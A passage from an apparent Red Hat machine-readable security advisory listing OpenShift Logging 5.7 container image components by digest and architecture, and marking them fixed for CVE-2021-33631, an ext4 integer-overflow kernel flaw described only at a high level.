"product_reference": "openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64"
},
"product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x"
},
"product_reference": "openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64"
},
"product_reference": "openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x"
},
"product_reference": "openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le"
},
"product_reference": "openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64"
},
"product_reference": "openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64"
},
"product_reference": "openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le"
},
"product_reference": "openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x"
},
"product_reference": "openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64"
},
"product_reference": "openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64"
},
"product_reference": "openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64"
},
"product_reference": "openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64"
},
"product_reference": "openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le"
},
"product_reference": "openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x"
},
"product_reference": "openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64"
},
"product_reference": "openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64"
},
"product_reference": "openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x"
},
"product_reference": "openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le"
},
"product_reference": "openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64"
},
"product_reference": "openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64"
},
"product_reference": "openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le"
},
"product_reference": "openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x"
},
"product_reference": "openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64"
},
"product_reference": "openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x"
},
"product_reference": "openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64"
},
"product_reference": "openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
},
"product_reference": "openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-33631",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2024-01-30T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2261976"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the openEuler kernel in Linux filesystem modules that allows an integer overflow via mounting a corrupted filesystem. This issue affects the openEuler kernel in versions from 4.19.90 through 4.19.90-2401.3 and 5.10.0-60.18.0 through 5.10.0-183.0.0.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: ext4: kernel bug in ext4_write_inline_data_end()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat has protection mechanisms in place against buffer overflows, such as FORTIFY_SOURCE, Position Independent Executables or Stack Smashing Protection.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
